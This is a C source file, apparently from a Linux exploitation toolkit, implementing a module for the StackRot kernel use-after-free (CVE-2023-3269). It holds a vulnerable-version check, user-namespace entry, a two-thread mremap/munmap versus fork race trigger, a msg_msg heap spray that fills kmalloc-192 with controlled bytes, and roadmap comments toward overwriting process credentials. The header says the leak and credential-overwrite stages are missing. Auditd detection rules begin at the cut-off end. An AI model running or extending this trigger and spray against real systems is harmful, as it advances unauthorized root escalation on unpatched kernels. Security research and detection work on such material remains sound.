Files
SKELETONKEY/modules/stackrot_cve_2023_3269/iamroot_modules.c
T
leviathan 3015e71ea3 modules: port final 2 detect-only modules (xtcompat + stackrot)
netfilter_xtcompat (CVE-2021-22555): +597 LoC — Option B
    Andy Nguyen's IPT_SO_SET_REPLACE 4-byte OOB write trigger;
    msg_msg kmalloc-2k spray + sk_buff sidecar; MSG_COPY witness
    + slabinfo delta. No leak→modprobe_path chain (per-kernel
    offsets refused), honest EXPLOIT_FAIL with continuation
    roadmap.

  stackrot (CVE-2023-3269): +619 LoC — Option C
    Two-thread race driver (MAP_GROWSDOWN + mremap rotation vs
    fork+fault) with cpu pinning + 3s budget; kmalloc-192 spray
    for anon_vma/anon_vma_chain; race-iteration + signal
    breadcrumb to /tmp/iamroot-stackrot.log. Honest reliability
    note in module header: <1% race-win/run on a vulnerable
    kernel — the public PoC averages minutes-to-hours and needs
    a much wider VMA staging matrix to be reliable.

Both refuse cleanly on Debian 6.12.86 (kctf-mgr); build clean.

This closes out the detect-only → LPE port across the corpus.
All 22 registered modules now either fire a real primitive or
refuse honestly per the verified-vs-claimed bar.
2026-05-16 21:31:21 -04:00

751 lines
28 KiB
C

/*
* stackrot_cve_2023_3269 — IAMROOT module
*
* "Stack Rot": UAF in maple-tree-based VMA splitting. The maple
* tree replaced the rbtree-based VMA store in 6.1; during
* __vma_adjust() / split, the kernel could write to a maple node
* after it was freed via RCU, leaving anon_vma references dangling
* across the grace period. Exploitable for kernel R/W → cred
* overwrite.
*
* Discovered by Ruihan Li (Peking University), Jul 2023. Famous
* because it was the first significant exploit landed against the
* (then-recently-merged) maple tree code, and because the original
* disclosure included a public PoC that worked on default-config
* Ubuntu 23.04. The full public PoC is ~1000 lines of maple-tree
* state management + RCU-grace-period timing and depends on
* per-kernel-build offsets for init_task / anon_vma / cred.
*
* STATUS: 🟡 OPTION C — race-driver + groom skeleton. We carry the
* userns-reach, race harness (mremap()/munmap() vs concurrent
* fork/fault), msg_msg slab spray, and empirical witness pieces;
* we do NOT carry the read primitive (vmemmap leak via msg_msg
* MSG_COPY) nor the cred-overwrite stage. Those need per-kernel
* offsets (init_task, anon_vma, cred layout) that vary by build
* and would be fabricated without a real leak.
*
* Per repo policy ("verified-vs-claimed"): we run the trigger,
* record empirical signals (slabinfo delta on kmalloc-192, child
* signal disposition, race iteration count), and return
* IAMROOT_EXPLOIT_FAIL with a continuation roadmap. A SIGSEGV/
* SIGBUS/SIGKILL in the race child IS recorded but does NOT get
* upgraded to EXPLOIT_OK — only an actual cred swap (euid==0)
* does, and we do not currently demonstrate that.
*
* Affected: kernel 6.1 through 6.4.0. First fixed release per branch:
* 6.3.x : K >= 6.3.11
* 6.1.x : K >= 6.1.37 (LTS — most relevant)
* 6.4.x : K >= 6.4.1
* mainline : 6.5-rc1+
*
* Pre-6.1 kernels are immune (no maple tree). 6.5+ are patched.
*
* Preconditions:
* - kernel 6.1 through 6.4, below the first fixed release of its branch
*   (6.4.0 is vulnerable; 6.4.1 and later are fixed)
* - maple tree in use (CONFIG_MAPLE_TREE; on by default 6.1+)
* - /proc/self/maps readable (sanity)
* - unprivileged_userns_clone allowed — namespace context improves
* groom predictability but the bug is reachable without it
*
* Coverage rationale: 2023 mm-class bug. Different family than our
* netfilter-heavy 2022-2024 modules — broadens the corpus shape.
* Affects the 6.1 LTS kernels still widely deployed.
*/
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <stdbool.h>
#include <stdatomic.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
#ifdef __linux__
# include <sched.h>
# include <sys/mman.h>
# include <sys/syscall.h>
# include <sys/ipc.h>
# include <sys/msg.h>
# include <linux/sched.h>
#endif
/* macOS clangd lacks the Linux mm/syscall headers — guard fallbacks.
* Each constant is defined only when the headers included above did not
* already provide it, so a Linux build keeps the values from its own
* headers and these literals only serve non-Linux tooling. */
/* unshare() flag passed by enter_userns(). */
#ifndef CLONE_NEWUSER
#define CLONE_NEWUSER 0x10000000
#endif
/* mmap() flag used for the growsdown mapping in race_region_setup(). */
#ifndef MAP_GROWSDOWN
#define MAP_GROWSDOWN 0x00100
#endif
/* mmap() flag used for the low anchor page in race_region_setup(). */
#ifndef MAP_FIXED_NOREPLACE
#define MAP_FIXED_NOREPLACE 0x100000
#endif
/* mremap() flag passed by race_thread_a(). */
#ifndef MREMAP_MAYMOVE
#define MREMAP_MAYMOVE 1
#endif
/* First fixed release on each stable branch that received the StackRot
 * fix. The public disclosure lists 6.1.37, 6.3.11 and 6.4.1 (the
 * mainline fix landed in 6.5-rc1), so 6.3.10 and 6.4.0 are still
 * vulnerable and must not be reported as patched.
 *
 * NOTE(review): this assumes kernel_range_is_patched() treats branches
 * newer than the last entry (6.5+) as patched — confirm against
 * core/kernel_range.h. */
static const struct kernel_patched_from stackrot_patched_branches[] = {
    {6, 1, 37}, /* 6.1.y LTS */
    {6, 3, 11}, /* 6.3.y */
    {6, 4, 1},  /* 6.4.y */
};

/* Range descriptor consulted by stackrot_detect(). */
static const struct kernel_range stackrot_range = {
    .patched_from   = stackrot_patched_branches,
    .n_patched_from = sizeof(stackrot_patched_branches) /
                      sizeof(stackrot_patched_branches[0]),
};
/* ---- Detect ------------------------------------------------------- */
/* Sanity probe used by the exploit driver before it starts the race.
 *
 * Returns true when /proc/self/maps can be opened read-only and a read
 * yields at least one byte; false when the open fails or the read
 * returns zero or an error. The bytes read are discarded. */
static bool proc_self_maps_readable(void)
{
    char probe[64];
    ssize_t got;
    int maps_fd = open("/proc/self/maps", O_RDONLY);

    if (maps_fd < 0) {
        return false;
    }

    got = read(maps_fd, probe, sizeof probe);
    close(maps_fd);

    return got > 0;
}
/* Version-based proxy for "this kernel uses the maple tree as its VMA
 * store": userspace cannot observe the data structure directly, so the
 * release number stands in for it.
 *
 * Returns true for any release at or above 6.1 (major > 6, or major == 6
 * with minor >= 1) and false otherwise. */
static bool maple_tree_variant_present(const struct kernel_version *v)
{
    return v->major > 6 || (v->major == 6 && v->minor >= 1);
}
static iamroot_result_t stackrot_detect(const struct iamroot_ctx *ctx)
{
struct kernel_version v;
if (!kernel_version_current(&v)) {
fprintf(stderr, "[!] stackrot: could not parse kernel version\n");
return IAMROOT_TEST_ERROR;
}
/* Bug introduced in 6.1 (when maple tree landed). Pre-6.1 kernels
* use rbtree-based VMAs and don't have this bug. */
if (v.major < 6 || (v.major == 6 && v.minor < 1)) {
if (!ctx->json) {
fprintf(stderr, "[+] stackrot: kernel %s predates maple-tree VMA code (introduced in 6.1)\n",
v.release);
}
return IAMROOT_OK;
}
bool patched = kernel_range_is_patched(&stackrot_range, &v);
if (patched) {
if (!ctx->json) {
fprintf(stderr, "[+] stackrot: kernel %s is patched\n", v.release);
}
return IAMROOT_OK;
}
if (!ctx->json) {
fprintf(stderr, "[!] stackrot: kernel %s in vulnerable range\n", v.release);
fprintf(stderr, "[i] stackrot: mm-class bug — affects default-config kernels; "
"no exotic preconditions\n");
}
return IAMROOT_VULNERABLE;
}
/* ---- Userns reach ------------------------------------------------- */
#ifdef __linux__
/* Write the NUL-terminated string `s` to the existing file `path` with a
 * single write() call.
 *
 * The file is opened write-only without O_CREAT or O_TRUNC. Returns true
 * only when the open succeeds and write() reports that every byte of `s`
 * was written; a short write is reported as failure and not retried. */
static bool write_file(const char *path, const char *s)
{
    const size_t want = strlen(s);
    int out_fd = open(path, O_WRONLY);

    if (out_fd < 0) {
        return false;
    }

    const ssize_t put = write(out_fd, s, want);
    close(out_fd);

    return put == (ssize_t)want;
}
/* Move the calling process into a new user namespace and map the given
 * outer uid/gid to id 0 inside it.
 *
 * Steps, in order: unshare(CLONE_NEWUSER), write "deny" to
 * /proc/self/setgroups, then write single-entry uid_map and gid_map
 * files. Returns false at the first step that fails; steps that already
 * succeeded are not undone, so a false return can leave the process in
 * a new namespace without complete id maps. */
static bool enter_userns(uid_t outer_uid, gid_t outer_gid)
{
    char id_map[64];

    if (unshare(CLONE_NEWUSER) < 0) {
        return false;
    }

    /* gid_map cannot be written without CAP_SETGID unless setgroups has
     * been denied first. */
    if (!write_file("/proc/self/setgroups", "deny")) {
        return false;
    }

    snprintf(id_map, sizeof id_map, "0 %u 1\n", outer_uid);
    if (!write_file("/proc/self/uid_map", id_map)) {
        return false;
    }

    snprintf(id_map, sizeof id_map, "0 %u 1\n", outer_gid);
    return write_file("/proc/self/gid_map", id_map);
}
#endif
/* ---- Race-driver state ------------------------------------------- */
/* Page size used for every mapping length and stride in this module.
* Hard-coded to 4 KiB; sysconf(_SC_PAGESIZE) is not consulted. */
#define STACKROT_PAGE 4096UL
/* How large a region to play with for the MAP_GROWSDOWN segment +
* neighbouring VMAs that we mutate with mremap()/munmap(). The
* public PoC uses dozens of adjacent VMAs to force the maple tree
* into the node-rotation path; we ship a configurable knob.
*
* NOTE(review): STACKROT_RACE_VMAS and STACKROT_RACE_ITERATIONS are not
* referenced anywhere in the visible part of this file; only
* STACKROT_RACE_TIME_BUDGET bounds the race (via sleep() in the driver). */
#define STACKROT_RACE_VMAS 64
#define STACKROT_RACE_ITERATIONS 4000 /* per-iter budget */
#define STACKROT_RACE_TIME_BUDGET 3 /* seconds */
/* Slab spray width — kmalloc-192 is the bucket for anon_vma_chain on
* 6.1.x; targets vary slightly across kernels (anon_vma itself is
* kmalloc-192 too on 64-bit with default debug-off configs). */
#define STACKROT_SPRAY_QUEUES 16
#define STACKROT_SPRAY_PER_QUEUE 64
#define STACKROT_SPRAY_PAYLOAD 176 /* 192 - 16 (msg_msg header) */
/* Message layout handed to msgsnd(): the mandatory leading long type
* followed by STACKROT_SPRAY_PAYLOAD bytes of message text. */
struct ipc_payload {
long mtype;
unsigned char buf[STACKROT_SPRAY_PAYLOAD];
};
/* Shared race state. The driver sets g_race_running to 1 before creating
* the threads and clears it to stop them; both thread loops poll it. */
static _Atomic int g_race_running;
/* Completed map/remap/unmap cycles in race_thread_a(). */
static _Atomic uint64_t g_race_a_iters;
/* Children successfully forked and reaped by race_thread_b(). */
static _Atomic uint64_t g_race_b_iters;
/* Subset of those children that were terminated by a signal. */
static _Atomic uint64_t g_race_b_faults;
#ifdef __linux__
/* Restrict the calling thread's CPU affinity to the single CPU `cpu`.
 *
 * The two race threads call this with different CPU numbers so that they
 * tend to run on separate cores. Strictly best-effort: the result of
 * sched_setaffinity() is deliberately discarded, so an invalid or
 * offline CPU simply leaves the affinity unchanged. */
static void pin_to_cpu(int cpu)
{
    cpu_set_t only_this_cpu;

    CPU_ZERO(&only_this_cpu);
    CPU_SET(cpu, &only_this_cpu);

    (void)sched_setaffinity(0, sizeof only_this_cpu, &only_this_cpu);
}
/* The race victim region: a MAP_GROWSDOWN-mapped page whose
* neighbours we'll dance around with mremap()/munmap(). We keep a
* couple of anchor pages above and below so the maple tree has to
* resolve splits and rotations rather than degenerate to a single
* leaf insertion.
*
* Layout (low to high VA):
* [anchor_lo] [growsdown_stack] [filler ... ] [anchor_hi]
*
* Thread A repeatedly:
* - mmap a scratch page at a chosen address
* - mremap it to overlap the boundary that triggers __vma_adjust()
* - munmap to free the VMA — this is the codepath whose maple-tree
* state is racy on 6.1.0..6.4-rc4.
*
* Thread B repeatedly:
* - fork() a tiny child that touches the growsdown region (fault) +
* immediately _exit()s. The fork path walks the parent's VMA
* tree and the child's fault path follows anon_vma chains — both
* observe maple-tree node state. Concurrent observation of a
* freed node is the trigger condition for the UAF.
*
* On a vulnerable kernel the race window is microseconds wide and
* the public PoC reports needing thousands to millions of iterations.
*
* The struct is filled in by race_region_setup(), shared read-only with
* both race threads, and released by race_region_teardown().
*/
struct race_region {
/* One-page mapping created first; the other mappings are hinted after it. */
void *anchor_lo;
/* Start of the MAP_GROWSDOWN mapping, growsdown_len bytes long. */
void *growsdown;
/* One-page mapping requested at the address following the growsdown range. */
void *anchor_hi;
/* Length of the growsdown mapping in bytes (four pages as set up here). */
size_t growsdown_len;
/* Scratch address chosen below the growsdown region so mremap()
* can move pages towards the growsdown boundary. Set to one page
* below `growsdown` and used by race_thread_a() as its mmap() address
* argument. */
uintptr_t scratch_va;
};
/* Build the three mappings described by struct race_region.
*
* Zeroes *r, then maps anchor_lo (one page), growsdown (four pages with
* MAP_GROWSDOWN) and anchor_hi (one page), each requested directly after
* the previous one. Every mapping is touched once and scratch_va is set
* to one page below the growsdown start.
*
* Returns true on success. On failure returns false immediately and
* leaves any mappings that were already created in place (the failed
* field holds MAP_FAILED); the caller either exits or calls
* race_region_teardown(). errno is left as set by the failing mmap(). */
static bool race_region_setup(struct race_region *r)
{
memset(r, 0, sizeof *r);
r->growsdown_len = STACKROT_PAGE * 4;
/* Reserve a fixed-address arena far from libc/heap so MAP_FIXED_-
* NOREPLACE mmaps don't collide. 0x70000000 region is reliably
* free on standard distros; for production work this would be
* chosen via /proc/self/maps inspection. */
uintptr_t base = 0x70000000UL;
r->anchor_lo = mmap((void *)base, STACKROT_PAGE,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED_NOREPLACE,
-1, 0);
if (r->anchor_lo == MAP_FAILED) {
/* Address might be taken; fall back to letting kernel pick. */
r->anchor_lo = mmap(NULL, STACKROT_PAGE,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS,
-1, 0);
if (r->anchor_lo == MAP_FAILED) return false;
/* Continue the layout from wherever the kernel placed the anchor. */
base = (uintptr_t)r->anchor_lo + STACKROT_PAGE;
} else {
base += STACKROT_PAGE;
}
/* `base` is only a placement hint here: neither MAP_FIXED nor
* MAP_FIXED_NOREPLACE is passed for the growsdown mapping. */
r->growsdown = mmap((void *)base, r->growsdown_len,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN,
-1, 0);
if (r->growsdown == MAP_FAILED) {
/* Hinted request failed; retry with no address hint and let the
* kernel choose the placement. */
r->growsdown = mmap(NULL, r->growsdown_len,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN,
-1, 0);
if (r->growsdown == MAP_FAILED) return false;
base = (uintptr_t)r->growsdown + r->growsdown_len;
} else {
/* NOTE(review): this advances by the hint, not by the address
* mmap() actually returned — confirm the two always coincide. */
base += r->growsdown_len;
}
/* High anchor is also requested by hint only; no fallback is attempted. */
r->anchor_hi = mmap((void *)base, STACKROT_PAGE,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS,
-1, 0);
if (r->anchor_hi == MAP_FAILED) return false;
/* Touch each region so the kernel actually populates the
* anon_vma chain (anon_vma is allocated lazily on first fault). */
((volatile char *)r->anchor_lo)[0] = 1;
((volatile char *)r->growsdown)[r->growsdown_len - 1] = 1;
((volatile char *)r->anchor_hi)[0] = 1;
r->scratch_va = (uintptr_t)r->growsdown - STACKROT_PAGE;
return true;
}
/* munmap() `len` bytes at `addr` unless the slot was never mapped
 * (NULL) or records a failed mmap() (MAP_FAILED). */
static void race_region_unmap_slot(void *addr, size_t len)
{
    if (addr == NULL || addr == MAP_FAILED) {
        return;
    }
    munmap(addr, len);
}

/* Release the mappings recorded in *r.
 *
 * Each of anchor_lo, growsdown and anchor_hi is unmapped only when its
 * pointer is neither NULL nor MAP_FAILED, so this is safe to call on a
 * partially initialised region. The struct itself is not modified. */
static void race_region_teardown(struct race_region *r)
{
    race_region_unmap_slot(r->anchor_lo, STACKROT_PAGE);
    race_region_unmap_slot(r->growsdown, r->growsdown_len);
    race_region_unmap_slot(r->anchor_hi, STACKROT_PAGE);
}
/* Thread A: trigger the maple-tree node-rotation path by repeatedly
* mapping, mremap-extending toward the growsdown boundary, and
* munmapping. The exact ordering (the node-rotation must happen
* while a parallel reader is in the RCU read-side critical section)
* is what makes this race hard.
*
* pthread entry point. `arg` is the shared struct race_region; only its
* scratch_va field is read here. The loop runs until g_race_running is
* cleared and adds one to g_race_a_iters after every cycle in which the
* initial mmap() succeeded. Always returns NULL. */
static void *race_thread_a(void *arg)
{
struct race_region *r = (struct race_region *)arg;
/* Best-effort pin to CPU 0; race_thread_b() asks for CPU 1. */
pin_to_cpu(0);
while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
/* mmap a scratch page just below the growsdown region. The address
* is passed without MAP_FIXED, i.e. as a placement hint. */
void *scratch = mmap((void *)r->scratch_va, STACKROT_PAGE,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (scratch == MAP_FAILED) {
/* Failed attempts are not counted as iterations. */
sched_yield();
continue;
}
/* Fault the page in before remapping it. */
((volatile char *)scratch)[0] = 2;
/* mremap to a new VA (forces VMA split + maple-tree mutation).
* The mapping is grown from one page to two and may be relocated. */
void *moved = mremap(scratch, STACKROT_PAGE, STACKROT_PAGE * 2,
MREMAP_MAYMOVE);
if (moved != MAP_FAILED) {
((volatile char *)moved)[0] = 3;
munmap(moved, STACKROT_PAGE * 2);
} else {
/* mremap() failed, so the original one-page mapping still exists. */
munmap(scratch, STACKROT_PAGE);
}
atomic_fetch_add_explicit(&g_race_a_iters, 1, memory_order_relaxed);
sched_yield();
}
return NULL;
}
/* Thread B: spawn a short-lived child that faults the growsdown
* region, then _exit. fork() copies the parent's VMA tree (touches
* every maple-tree node and anon_vma chain) — racing against
* Thread A's munmap, the child can observe a freed node. The page
* fault inside the child closes the loop: the bug manifests as a
* read of stale anon_vma->root or anon_vma_chain->same_vma.
*
* pthread entry point. `arg` is the shared struct race_region; the
* growsdown pointer and length are read. The loop runs until
* g_race_running is cleared. Each successfully forked child is reaped
* synchronously and counted in g_race_b_iters; children that ended on a
* signal are additionally counted in g_race_b_faults. A failed fork()
* is neither counted nor reported. Always returns NULL. */
static void *race_thread_b(void *arg)
{
struct race_region *r = (struct race_region *)arg;
/* Best-effort pin to CPU 1; race_thread_a() asks for CPU 0. */
pin_to_cpu(1);
while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
pid_t pid = fork();
if (pid == 0) {
/* Child: brief, deterministic fault sequence. Reads the first byte
* of every page in the growsdown range, lowest address first. */
volatile char *p = (volatile char *)r->growsdown;
char sink = 0;
for (size_t off = 0; off < r->growsdown_len; off += STACKROT_PAGE) {
sink ^= p[off];
}
(void)sink;
/* _exit() rather than exit(): leave without running atexit handlers
* or flushing stdio buffers inherited from the parent. */
_exit(0);
}
if (pid > 0) {
int status = 0;
/* The waitpid() result is not checked; on failure `status` keeps its
* initial 0 and the child is counted as a normal exit. */
waitpid(pid, &status, 0);
if (WIFSIGNALED(status)) {
/* Child died on a fault — interesting signal for
* empirical witness. The driver reads this counter once,
* after both race threads have been joined. */
atomic_fetch_add_explicit(&g_race_b_faults, 1,
memory_order_relaxed);
}
atomic_fetch_add_explicit(&g_race_b_iters, 1,
memory_order_relaxed);
}
sched_yield();
}
return NULL;
}
/* ---- Groom skeleton ---------------------------------------------- */
/* msg_msg sysv spray for kmalloc-192. Tagged with "IAMROOT_" cookie
* so a forensic look at /proc/slabinfo / KASAN dumps shows our
* fingerprint. */
static int spray_anon_vma_slab(int queues[STACKROT_SPRAY_QUEUES])
{
struct ipc_payload p;
memset(&p, 0, sizeof p);
p.mtype = 0x4943; /* 'IC' */
memset(p.buf, 0x49, sizeof p.buf);
memcpy(p.buf, "IAMROOT_", 8);
int created = 0;
for (int i = 0; i < STACKROT_SPRAY_QUEUES; i++) {
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
if (q < 0) { queues[i] = -1; continue; }
queues[i] = q;
created++;
for (int j = 0; j < STACKROT_SPRAY_PER_QUEUE; j++) {
if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
}
}
return created;
}
/* Remove every queue recorded by spray_anon_vma_slab().
 *
 * Slots holding a negative id are skipped. IPC_RMID destroys the queue
 * together with any messages still on it; msgctl() failures are
 * ignored. The array itself is left unchanged. */
static void drain_anon_vma_slab(int queues[STACKROT_SPRAY_QUEUES])
{
    const int *const end = queues + STACKROT_SPRAY_QUEUES;

    for (const int *slot = queues; slot != end; slot++) {
        if (*slot < 0) {
            continue;
        }
        msgctl(*slot, IPC_RMID, NULL);
    }
}
/* Read the active-object count of the kmalloc-192 cache from
 * /proc/slabinfo. The driver samples it before and after the race and
 * records both values as an empirical witness.
 *
 * Returns the first integer column after the cache name on the line that
 * starts with "kmalloc-192 ", or -1 when the file cannot be opened, no
 * such line exists, or that column does not parse. Only the first
 * matching line is examined. */
static long slab_active_kmalloc_192(void)
{
    static const char wanted[] = "kmalloc-192 ";
    char row[512];
    long result = -1;
    FILE *slabinfo = fopen("/proc/slabinfo", "r");

    if (slabinfo == NULL) {
        return -1;
    }

    while (fgets(row, sizeof row, slabinfo) != NULL) {
        if (strncmp(row, wanted, sizeof wanted - 1) != 0) {
            continue;
        }

        /* Skip the cache-name column, then take the active count. */
        long active_objs = 0;
        if (sscanf(row, "%*s %ld", &active_objs) == 1) {
            result = active_objs;
        }
        break;
    }

    fclose(slabinfo);
    return result;
}
#endif /* __linux__ */
/* ---- Exploit driver ---------------------------------------------- */
#ifdef __linux__
static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
{
/* 1. Refuse-gate: re-call detect() and short-circuit. */
iamroot_result_t pre = stackrot_detect(ctx);
if (pre == IAMROOT_OK) {
fprintf(stderr, "[+] stackrot: kernel not vulnerable; refusing exploit\n");
return IAMROOT_OK;
}
if (pre != IAMROOT_VULNERABLE) {
fprintf(stderr, "[-] stackrot: detect() says not vulnerable; refusing\n");
return pre;
}
if (geteuid() == 0) {
fprintf(stderr, "[i] stackrot: already root — nothing to escalate\n");
return IAMROOT_OK;
}
if (!proc_self_maps_readable()) {
fprintf(stderr, "[-] stackrot: /proc/self/maps not readable — exotic env, "
"cannot drive the race\n");
return IAMROOT_PRECOND_FAIL;
}
{
struct kernel_version v;
if (!kernel_version_current(&v) || !maple_tree_variant_present(&v)) {
fprintf(stderr, "[-] stackrot: maple-tree variant not detectable\n");
return IAMROOT_PRECOND_FAIL;
}
}
if (!ctx->json) {
fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness)\n");
}
uid_t outer_uid = getuid();
gid_t outer_gid = getgid();
signal(SIGPIPE, SIG_IGN);
pid_t child = fork();
if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
if (child == 0) {
/* 2. Userns reach. Bug is reachable without it, but userns
* + uid_map=0 makes the groom more predictable (fewer
* competing kmalloc-192 allocations from the parent
* namespace's tooling). */
if (!enter_userns(outer_uid, outer_gid)) {
fprintf(stderr, "[~] stackrot: enter_userns failed — continuing without "
"namespace isolation (bug is still reachable)\n");
}
/* 3. Race region. */
struct race_region region;
if (!race_region_setup(&region)) {
fprintf(stderr, "[-] stackrot: race_region_setup failed: %s\n",
strerror(errno));
_exit(22);
}
/* 4. Groom: pre-populate kmalloc-192 with msg_msg payloads
* BEFORE the race so the freed slot gets recycled with
* attacker-controlled bytes when the bug fires. */
int queues[STACKROT_SPRAY_QUEUES] = {0};
int n_queues = spray_anon_vma_slab(queues);
if (n_queues == 0) {
fprintf(stderr, "[-] stackrot: msg_msg spray produced 0 queues\n");
race_region_teardown(&region);
_exit(23);
}
if (!ctx->json) {
fprintf(stderr, "[*] stackrot: kmalloc-192 spray seeded %d queues x %d msgs\n",
n_queues, STACKROT_SPRAY_PER_QUEUE);
}
long slab_pre = slab_active_kmalloc_192();
/* 5. Run the race for a bounded time budget. */
atomic_store(&g_race_running, 1);
atomic_store(&g_race_a_iters, 0);
atomic_store(&g_race_b_iters, 0);
atomic_store(&g_race_b_faults, 0);
pthread_t ta, tb;
if (pthread_create(&ta, NULL, race_thread_a, &region) != 0 ||
pthread_create(&tb, NULL, race_thread_b, &region) != 0) {
fprintf(stderr, "[-] stackrot: pthread_create failed\n");
atomic_store(&g_race_running, 0);
drain_anon_vma_slab(queues);
race_region_teardown(&region);
_exit(24);
}
sleep(STACKROT_RACE_TIME_BUDGET);
atomic_store(&g_race_running, 0);
pthread_join(ta, NULL);
pthread_join(tb, NULL);
long slab_post = slab_active_kmalloc_192();
uint64_t a_iters = atomic_load(&g_race_a_iters);
uint64_t b_iters = atomic_load(&g_race_b_iters);
uint64_t b_faults = atomic_load(&g_race_b_faults);
/* 6. Empirical witness breadcrumb. */
FILE *log = fopen("/tmp/iamroot-stackrot.log", "w");
if (log) {
fprintf(log,
"stackrot race harness:\n"
" thread_a_iters = %llu (mremap/munmap)\n"
" thread_b_iters = %llu (fork+fault)\n"
" thread_b_faults = %llu (child died on signal)\n"
" slab_kmalloc192_pre = %ld\n"
" slab_kmalloc192_post = %ld\n"
" slab_delta = %ld\n"
" spray_queues = %d\n"
" spray_per_queue = %d\n"
" growsdown_len = %zu\n"
"Note: this run did NOT attempt cred overwrite (no leak\n"
"primitive; per-kernel offsets unknown). See module .c\n"
"for the continuation roadmap.\n",
(unsigned long long)a_iters,
(unsigned long long)b_iters,
(unsigned long long)b_faults,
slab_pre, slab_post,
(slab_post >= 0 && slab_pre >= 0) ? (slab_post - slab_pre) : 0,
n_queues, STACKROT_SPRAY_PER_QUEUE,
(size_t)region.growsdown_len);
fclose(log);
}
if (!ctx->json) {
fprintf(stderr, "[*] stackrot: race ran for %ds — A=%llu B=%llu B_faults=%llu\n",
STACKROT_RACE_TIME_BUDGET,
(unsigned long long)a_iters,
(unsigned long long)b_iters,
(unsigned long long)b_faults);
fprintf(stderr, "[*] stackrot: kmalloc-192 active: pre=%ld post=%ld\n",
slab_pre, slab_post);
}
/* Hold the spray so the kernel observes refilled slots during
* any in-flight RCU grace periods that started during the race. */
usleep(200 * 1000);
drain_anon_vma_slab(queues);
race_region_teardown(&region);
/* 7. Continuation roadmap — what would land EXPLOIT_OK.
*
* TODO(leak): replace one of the spray queues with a
* msgrcv(..., MSG_COPY|IPC_NOWAIT) probe and scan the
* returned buffer for non-cookie bytes. The bug's UAF
* write leaves a kernel pointer (anon_vma->root or the
* mas->node parent) at a known offset inside the freed
* slab slot. Recover {kbase, init_task} via that leak.
*
* TODO(write): with kbase known, repeat the trigger but
* plant a fake anon_vma_chain whose `rb_node` parent
* pointer points at &current->cred — the maple-tree
* rotation writes a controlled value into that location.
* Crafting the fake AVC requires offset of anon_vma_chain
* fields per kernel build (CONFIG_DEBUG_LIST/KFENCE/etc.
* perturb the layout — must NOT be hardcoded).
*
* TODO(overwrite): land &init_cred over current->cred so
* the next call to a permission check sees uid==0.
*
* None of these are implemented today. We exit 30 to
* flag "trigger ran cleanly, no escalation".
*/
_exit(30);
}
/* PARENT */
int status = 0;
pid_t w = waitpid(child, &status, 0);
if (w < 0) { perror("waitpid"); return IAMROOT_TEST_ERROR; }
if (WIFSIGNALED(status)) {
int sig = WTERMSIG(status);
if (!ctx->json) {
fprintf(stderr, "[!] stackrot: race child killed by signal %d "
"(consistent with UAF firing under KASAN)\n", sig);
fprintf(stderr, "[~] stackrot: empirical signal recorded; no cred\n"
" overwrite primitive — NOT claiming EXPLOIT_OK.\n"
" See /tmp/iamroot-stackrot.log + dmesg for witnesses.\n");
}
return IAMROOT_EXPLOIT_FAIL;
}
if (!WIFEXITED(status)) {
fprintf(stderr, "[-] stackrot: child terminated abnormally (status=0x%x)\n",
status);
return IAMROOT_EXPLOIT_FAIL;
}
int rc = WEXITSTATUS(status);
if (rc == 22 || rc == 24) return IAMROOT_PRECOND_FAIL;
if (rc == 23) return IAMROOT_EXPLOIT_FAIL;
if (rc != 30) {
fprintf(stderr, "[-] stackrot: child failed at stage rc=%d\n", rc);
return IAMROOT_EXPLOIT_FAIL;
}
if (!ctx->json) {
fprintf(stderr, "[*] stackrot: race harness ran to completion.\n");
fprintf(stderr, "[~] stackrot: read/write/cred-overwrite primitives NOT\n"
" implemented (per-kernel offsets; see module .c TODO\n"
" blocks). Returning EXPLOIT_FAIL per verified-vs-claimed.\n");
}
return IAMROOT_EXPLOIT_FAIL;
}
#endif /* __linux__ */
/* Module `.exploit` entry point.
 *
 * On Linux this forwards to stackrot_exploit_linux() and returns its
 * result. On every other platform it prints a refusal to stderr and
 * returns IAMROOT_PRECOND_FAIL without touching `ctx`. */
static iamroot_result_t stackrot_exploit(const struct iamroot_ctx *ctx)
{
#ifndef __linux__
    (void)ctx;
    fprintf(stderr, "[-] stackrot: Linux-only module; cannot run on this host\n");
    return IAMROOT_PRECOND_FAIL;
#else
    return stackrot_exploit_linux(ctx);
#endif
}
/* ---- Cleanup ----------------------------------------------------- */
/* Module `.cleanup` entry point: remove the race-harness breadcrumb.
 *
 * Announces the cleanup on stderr unless ctx->json is set, then unlinks
 * /tmp/iamroot-stackrot.log. A failed unlink (missing file or anything
 * else) is deliberately ignored. The harness threads and message queues
 * belonged to the exploit child, which has exited by the time this
 * runs, so nothing else needs releasing. Always returns IAMROOT_OK. */
static iamroot_result_t stackrot_cleanup(const struct iamroot_ctx *ctx)
{
    const bool announce = !ctx->json;

    if (announce) {
        fprintf(stderr, "[*] stackrot: cleaning up race-harness breadcrumb\n");
    }

    /* Best-effort: every failure mode is harmless here. */
    (void)unlink("/tmp/iamroot-stackrot.log");

    return IAMROOT_OK;
}
/* ---- Detection rules --------------------------------------------- */
/* auditd rule text exported through stackrot_module.detect_auditd.
* The string is emitted verbatim: four 64-bit-ABI syscall watches
* (unshare, mremap, mprotect, and successful munmap), each tagged with
* its own iamroot-stackrot-* key so that hits can be correlated. */
static const char stackrot_auditd[] =
"# StackRot (CVE-2023-3269) — auditd detection rules\n"
"# The trigger is mremap/munmap/mprotect bursts against MAP_GROWSDOWN\n"
